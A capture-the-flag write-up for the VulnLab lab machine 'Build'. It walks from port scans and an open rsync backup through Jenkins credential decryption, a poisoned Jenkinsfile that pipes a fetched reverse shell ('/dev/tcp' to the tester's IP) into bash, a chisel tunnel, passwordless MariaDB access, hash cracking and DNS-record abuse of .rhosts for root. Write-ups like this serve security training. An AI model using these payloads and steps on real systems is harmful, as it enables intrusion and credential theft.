VulnLab Build
VulnLab Build
VulnLab Build
Build
Recon
Perform basic port scan using rustscan and nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
└─$ rustscan -a 10.10.108.36 -r 1-65535
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
To scan or not to scan? That is the question.
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.108.36:22
Open 10.10.108.36:53
Open 10.10.108.36:512
Open 10.10.108.36:513
Open 10.10.108.36:514
Open 10.10.108.36:873
Open 10.10.108.36:3000
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 23:36 +05
Initiating Ping Scan at 23:36
Scanning 10.10.108.36 [4 ports]
Completed Ping Scan at 23:36, 0.12s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:36
Completed Parallel DNS resolution of 1 host. at 23:36, 0.06s elapsed
DNS resolution of 1 IPs took 0.07s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 23:36
Scanning 10.10.108.36 [7 ports]
Discovered open port 53/tcp on 10.10.108.36
Discovered open port 22/tcp on 10.10.108.36
Discovered open port 513/tcp on 10.10.108.36
Discovered open port 512/tcp on 10.10.108.36
Discovered open port 873/tcp on 10.10.108.36
Discovered open port 514/tcp on 10.10.108.36
Discovered open port 3000/tcp on 10.10.108.36
Completed SYN Stealth Scan at 23:36, 0.11s elapsed (7 total ports)
Nmap scan report for 10.10.108.36
Host is up, received echo-reply ttl 63 (0.086s latency).
Scanned at 2024-12-05 23:36:00 +05 for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
53/tcp open domain syn-ack ttl 62
512/tcp open exec syn-ack ttl 63
513/tcp open login syn-ack ttl 63
514/tcp open shell syn-ack ttl 63
873/tcp open rsync syn-ack ttl 63
3000/tcp open ppp syn-ack ttl 62
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds
Raw packets sent: 11 (460B) | Rcvd: 8 (336B)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
└─$ nmap -sC -sV -p- 10.10.108.36
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 23:36 +05
Nmap scan report for 10.10.108.36
Host is up (0.089s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 47:21:73:e2:6b:96:cd:f9:13:11:af:40:c8:4d:d6:7f (ECDSA)
|_ 256 2b:5e:ba:f3:72:d3:b3:09:df:25:41:29:09:f4:7b:f5 (ED25519)
53/tcp open domain PowerDNS
| dns-nsid:
| NSID: pdns (70646e73)
|_ id.server: pdns
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open shell Netkit rshd
873/tcp open rsync (protocol version 31)
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Content-Type: text/html; charset=utf-8
| Set-Cookie: i_like_gitea=34b705fc1d1c31de; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=TDnKpHWhL7EaNDXhgokdjAHvbRs6MTczMzQyMzk0NjM4NTEwNzI4OQ; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Thu, 05 Dec 2024 18:39:06 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-auto">
| <head>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>Gitea: Git with a cup of tea</title>
| <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovL2J1aWxkLnZsOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9idWlsZC52bDozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwic2l6ZXMiOiI1MTJ
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Allow: HEAD
| Allow: GET
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Set-Cookie: i_like_gitea=d04f75ac5b592f6c; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=akrIN4M89C2d7gk5bGyErTwb-E86MTczMzQyMzk1MTg2NzY5NTUwNw; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Thu, 05 Dec 2024 18:39:11 GMT
|_ Content-Length: 0
3306/tcp filtered mysql
8081/tcp filtered blackice-icecap
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.94SVN%I=7%D=12/5%Time=6751F395%P=x86_64-pc-linux-gnu%r
SF:(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x
SF:20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Ba
SF:d\x20Request")%r(GetRequest,2990,"HTTP/1\.0\x20200\x20OK\r\nCache-Contr
SF:ol:\x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\nCo
SF:ntent-Type:\x20text/html;\x20charset=utf-8\r\nSet-Cookie:\x20i_like_git
SF:ea=34b705fc1d1c31de;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nSet-Coo
SF:kie:\x20_csrf=TDnKpHWhL7EaNDXhgokdjAHvbRs6MTczMzQyMzk0NjM4NTEwNzI4OQ;\x
SF:20Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-Frame-Opt
SF:ions:\x20SAMEORIGIN\r\nDate:\x20Thu,\x2005\x20Dec\x202024\x2018:39:06\x
SF:20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"the
SF:me-auto\">\n<head>\n\t<meta\x20name=\"viewport\"\x20content=\"width=dev
SF:ice-width,\x20initial-scale=1\">\n\t<title>Gitea:\x20Git\x20with\x20a\x
SF:20cup\x20of\x20tea</title>\n\t<link\x20rel=\"manifest\"\x20href=\"data:
SF:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHR
SF:lYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3Rhcn
SF:RfdXJsIjoiaHR0cDovL2J1aWxkLnZsOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6L
SF:y9idWlsZC52bDozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5n
SF:Iiwic2l6ZXMiOiI1MTJ")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n
SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r
SF:\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,197,"HTTP/1\.0\x20405\x20Me
SF:thod\x20Not\x20Allowed\r\nAllow:\x20HEAD\r\nAllow:\x20GET\r\nCache-Cont
SF:rol:\x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\nS
SF:et-Cookie:\x20i_like_gitea=d04f75ac5b592f6c;\x20Path=/;\x20HttpOnly;\x2
SF:0SameSite=Lax\r\nSet-Cookie:\x20_csrf=akrIN4M89C2d7gk5bGyErTwb-E86MTczM
SF:zQyMzk1MTg2NzY5NTUwNw;\x20Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20Sam
SF:eSite=Lax\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Thu,\x2005\x20D
SF:ec\x202024\x2018:39:11\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPR
SF:equest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/
SF:plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Re
SF:quest");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 328.78 seconds
Gitea is available port on 3000, 3306 and 8081 are filtered.
Nothing interesting there. But we saw rsync, so let’s check it
1
2
└─$ rsync -av --list-only rsync://10.10.108.36
backups backups
1
2
3
4
5
6
7
└─$ rsync -av --list-only rsync://10.10.108.36/backups
receiving incremental file list
drwxr-xr-x 4,096 2024/05/02 18:26:31 .
-rw-r--r-- 376,289,280 2024/05/02 18:26:19 jenkins.tar.gz
sent 24 bytes received 82 bytes 42.40 bytes/sec
total size is 376,289,280 speedup is 3,549,898.87
Let’s download the archive
1
2
3
4
5
6
7
8
9
10
└─$ rsync -av rsync://10.10.108.36/backups ./rsync_backups
receiving incremental file list
created directory ./rsync_backups
./
jenkins.tar.gz
sent 54 bytes received 376,381,276 bytes 794,891.93 bytes/sec
total size is 376,289,280 speedup is 1.00
1
2
3
4
5
└─$ tar xvf jenkins.tar.gz
jenkins_configuration/
jenkins_configuration/jenkins.model.ArtifactManagerConfiguration.xml
jenkins_configuration/hudson.plugins.git.GitTool.xml
<SNIP>
User
After downloading we find a password hash in users/admin_8569439066427679502/config.xml
1
2
3
4
5
6
7
8
└─$ cat users/admin_8569439066427679502/config.xml
<?xml version='1.1' encoding='UTF-8'?>
<user>
<SNIP>
<hudson.security.HudsonPrivateSecurityRealm_-Details>
<passwordHash>#jbcrypt:$2a$10$PaXdGyit8MLC9CEPjgw15.<REDACTED></passwordHash>
<SNIP>
</user>
Also grepping for password showed better results, we find the same user buildadm in config file within jobs folder
1
2
3
4
5
6
7
8
└─$ grep -nlir "password" .
./users/admin_8569439066427679502/config.xml
./plugins/pipeline-model-api/WEB-INF/lib/mailapi-1.6.2.jar
./plugins/credentials/help/domain/name.html
./plugins/credentials/help/domain/name_it.html
./plugins/credentials/WEB-INF/lib/credentials.jar
<SNIP>
./jobs/build/config.xml
Let’s try decrypting password. Download this or this decryptor and decrypt the password
1
2
└─$ python3 jenkins_offline_decrypt.py rsync_backups/jenkins_configuration/secrets/master.key rsync_backups/jenkins_configuration/secrets/hudson.util.Secret rsync_backups/jenkins_configuration/jobs/build/config.xml
<REDACTED>
Now, we can login to Gitea using creds buildadm:<REDACTED>. There we can edit Jenkinsfile which is responsible for pipeline
Host revshell payload /bin/bash -i >& /dev/tcp/10.8.4.147/6666 0>&1 (Check revshells.com)
1
2
3
└─$ cat shell
/bin/bash -i >& /dev/tcp/10.8.4.147/6666 0>&1
1
2
3
4
5
6
7
8
9
10
11
pipeline {
agent any
stages {
stage('Do nothing') {
steps {
sh 'curl http://10.8.4.147/shell | bash'
}
}
}
}
Start listener and commit the changes. After few minutes, the listener will receive connection.
Root
We see .dockerenv, meaning it’s a docker container
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
root@5ac6c7d6fb8e:/# ls -lha
ls -lha
total 60K
drwxr-xr-x 1 root root 4.0K May 9 2024 .
drwxr-xr-x 1 root root 4.0K May 9 2024 ..
-rwxr-xr-x 1 root root 0 May 9 2024 .dockerenv
lrwxrwxrwx 1 root root 7 Jan 10 2024 bin -> usr/bin
drwxr-xr-x 2 root root 4.0K Dec 9 2023 boot
drwxr-xr-x 5 root root 340 Dec 6 16:40 dev
drwxr-xr-x 1 root root 4.0K May 9 2024 etc
drwxr-xr-x 2 root root 4.0K Dec 9 2023 home
lrwxrwxrwx 1 root root 7 Jan 10 2024 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Jan 10 2024 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Jan 10 2024 lib64 -> usr/lib64
lrwxrwxrwx 1 root root 10 Jan 10 2024 libx32 -> usr/libx32
drwxr-xr-x 2 root root 4.0K Jan 10 2024 media
drwxr-xr-x 2 root root 4.0K Jan 10 2024 mnt
drwxr-xr-x 1 root root 4.0K Jan 16 2024 opt
dr-xr-xr-x 198 root root 0 Dec 6 16:40 proc
drwxr-xr-x 3 root root 4.0K May 2 2024 root
drwxr-xr-x 1 root root 4.0K Jan 16 2024 run
lrwxrwxrwx 1 root root 8 Jan 10 2024 sbin -> usr/sbin
drwxr-xr-x 2 root root 4.0K Jan 10 2024 srv
dr-xr-xr-x 13 root root 0 Dec 6 16:40 sys
drwxrwxrwt 1 root root 4.0K Dec 6 16:40 tmp
drwxr-xr-x 1 root root 4.0K Jan 10 2024 usr
drwxr-xr-x 1 root root 4.0K Jan 16 2024 var
We find mounted host’s /root/scripts/root directory to container’s /root directory
1
2
3
4
5
6
7
8
9
10
11
root@5ac6c7d6fb8e:/# findmnt
findmnt
TARGET SOURCE FSTYPE OPTIONS
/ overlay overlay rw,relatime,lowerdir=/var/snap/docker/
<SNIP> cgroup2 ro,nosuid,nodev,noexec,relatime,nsdelegate,memory_recursiveprot
├─/root /dev/mapper/ubuntu--vg-ubuntu--lv[/root/scripts/root] ext4 rw,relatime
├─/var/jenkins_home /dev/mapper/ubuntu--vg-ubuntu--lv[/root/scripts/jenkins/jenkins_configuration] ext4 rw,relatime
├─/etc/resolv.conf /dev/mapper/ubuntu--vg-ubuntu--lv[/var/snap/docker/common/var-lib-docker/containers/5ac6c7d6fb8e8d06afc73cfa40eb2d2ba23b93c78588a626987f124d1a83962e/resolv.conf] ext4 rw,relatime
├─/etc/hostname /dev/mapper/ubuntu--vg-ubuntu--lv[/var/snap/docker/common/var-lib-docker/containers/5ac6c7d6fb8e8d06afc73cfa40eb2d2ba23b93c78588a626987f124d1a83962e/hostname] ext4 rw,relatime
└─/etc/hosts /dev/mapper/ubuntu--vg-ubuntu--lv[/var/snap/docker/common/var-lib-docker/containers/5ac6c7d6fb8e8d06afc73cfa40eb2d2ba23b93c78588a626987f124d1a83962e/hosts] ext4 rw,relatime
We see .rhosts file with interesting content. According to man page: The .rhosts file can allow specific remote users and/or hosts to execute commands on the local machine. Such an entry grants password-free access for the user with the login name user from host. We remember seeing rsh/rlogin ports open during nmap/rustscan
1
2
3
4
5
6
7
8
9
10
11
12
13
root@5ac6c7d6fb8e:~# ls -lha
ls -lha
total 20K
drwxr-xr-x 3 root root 4.0K May 2 2024 .
drwxr-xr-x 1 root root 4.0K May 9 2024 ..
lrwxrwxrwx 1 root root 9 May 1 2024 .bash_history -> /dev/null
-r-------- 1 root root 35 May 1 2024 .rhosts
drwxr-xr-x 2 root root 4.0K May 1 2024 .ssh
-rw------- 1 root root 37 May 1 2024 user.txt
root@5ac6c7d6fb8e:~# cat .rhosts
cat .rhosts
admin.build.vl +
intern.build.vl +
Let’s setup a tunnel using chisel.
1
2
3
4
5
6
7
8
9
root@5ac6c7d6fb8e:/tmp# curl http://10.8.4.147/chisel/chisel -sO
curl http://10.8.4.147/chisel/chisel -sO
root@5ac6c7d6fb8e:/tmp# chmod +x chisel
chmod +x chisel
root@5ac6c7d6fb8e:/tmp# ./chisel client 10.8.4.147:9001 R:socks
./chisel client 10.8.4.147:9001 R:socks
2024/12/06 17:31:41 client: Connecting to ws://10.8.4.147:9001
2024/12/06 17:31:42 client: Connected (Latency 88.785593ms)
1
2
3
4
5
6
└─$ ./chisel server -p 9001 --reverse
2024/12/06 22:31:22 server: Reverse tunnelling enabled
2024/12/06 22:31:22 server: Fingerprint fhhdLF8ICIdImoAUUbwjXwCTU7rdIaftUEcv1zNbZjk=
2024/12/06 22:31:22 server: Listening on http://0.0.0.0:9001
2024/12/06 22:32:58 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
We know that ip is 172.18.0.3
1
2
3
root@5ac6c7d6fb8e:/# hostname -I
hostname -I
172.18.0.3
We remember ports 3306 and 8081 being filtered, but now via tunnel they are both accessible
1
2
3
4
5
6
7
└─$ proxychains4 -q curl http://172.18.0.1:8081 -I
HTTP/1.1 401 Unauthorized
Transfer-Encoding: chunked
Connection: close
Content-Type: text/plain; charset=utf-8
Www-Authenticate: Basic realm="PowerDNS"
If we try connecting as root to mysql, it successfully authenticates without a password
1
2
3
4
5
6
7
8
9
10
11
12
└─$ proxychains -q mysql -h 172.18.0.1 -u root --skip-ssl
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 31
Server version: 11.3.2-MariaDB-1:11.3.2+maria~ubu2204 mariadb.org binary distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
Inside we see powerdnsadmin database. Let’s check it
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| powerdnsadmin |
| sys |
+--------------------+
5 rows in set (0.090 sec)
MariaDB [(none)]> use powerdnsadmin;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [powerdnsadmin]>
We find dns records
1
2
3
4
5
6
7
8
9
10
11
12
13
14
MariaDB [powerdnsadmin]> select * from records;
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
| id | domain_id | name | type | content | ttl | prio | disabled | ordername | auth |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
| 8 | 1 | db.build.vl | A | 172.18.0.4 | 60 | 0 | 0 | NULL | 1 |
| 9 | 1 | gitea.build.vl | A | 172.18.0.2 | 60 | 0 | 0 | NULL | 1 |
| 10 | 1 | intern.build.vl | A | 172.18.0.1 | 60 | 0 | 0 | NULL | 1 |
| 11 | 1 | jenkins.build.vl | A | 172.18.0.3 | 60 | 0 | 0 | NULL | 1 |
| 12 | 1 | pdns-worker.build.vl | A | 172.18.0.5 | 60 | 0 | 0 | NULL | 1 |
| 13 | 1 | pdns.build.vl | A | 172.18.0.6 | 60 | 0 | 0 | NULL | 1 |
| 14 | 1 | build.vl | SOA | a.misconfigured.dns.server.invalid hostmaster.build.vl 2024050201 10800 3600 604800 3600 | 1500 | 0 | 0 | NULL | 1 |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
7 rows in set (0.089 sec)
We also retrieve admin’s password hash
1
2
3
4
5
6
7
8
MariaDB [powerdnsadmin]> select username,password,email from user;
+----------+--------------------------------------------------------------+----------------+
| username | password | email |
+----------+--------------------------------------------------------------+----------------+
| admin | $2b$12$<REDACTED>.hsEq | admin@build.vl |
+----------+--------------------------------------------------------------+----------------+
1 row in set (0.091 sec)
We manage to succesfully crack it using hashcat
1
2
3
4
5
6
7
8
9
└─$ hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-12th Gen Intel(R) Core(TM) i5-12400, 2913/5891 MB (1024 MB allocatable), 4MCU
<SNIP>
$2b$12$<REDACTED>:<REDACTED>
We manage to open PowerDns admin panel, in 172.18.0.6 (based on mysql records). In order to do that, set proxy settings in Firefox to point to created socks tunnel
Now, we do remember a file .rhosts we found in /root directory in container. Since we can create A records, we can create one with admin.build.vl pointing to our IP
We successfully add a new record and can now connect via rsh
https://api.vulnlab.com/api/v1/share?id=d762a5b0-b384-48b5-b40a-86f5f0a93aa3
This post is licensed under CC BY 4.0 by the author.